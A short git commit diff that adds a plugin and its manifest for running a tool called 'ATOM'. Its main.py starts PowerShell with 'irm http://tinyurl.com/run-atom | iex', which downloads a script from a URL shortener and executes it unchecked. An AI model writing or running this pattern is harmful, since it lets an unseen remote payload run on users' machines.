restore from backup
This commit is contained in:
commit
ad483a1403
11 changed files with 208 additions and 0 deletions
9
Plugins/atom/main.py
Normal file
9
Plugins/atom/main.py
Normal file
|
|
@ -0,0 +1,9 @@
|
|||
import subprocess
|
||||
import time
|
||||
|
||||
def Execute(self, path):
|
||||
# start atom
|
||||
process = subprocess.Popen(["powershell", "irm http://tinyurl.com/run-atom | iex"])
|
||||
self.alert("Atom has been started, please hit 'OK' when it is finished.", title="Atom")
|
||||
time.sleep(2)
|
||||
return
|
||||
7
Plugins/atom/manifest.json
Normal file
7
Plugins/atom/manifest.json
Normal file
|
|
@ -0,0 +1,7 @@
|
|||
{
|
||||
"name": "Run ATOM",
|
||||
"description": "Run 'A Tool of Mine'",
|
||||
"file": "main.py",
|
||||
"category": "PLUGINS",
|
||||
"position": 0
|
||||
}
|
||||
Loading…
Add table
Add a link
Reference in a new issue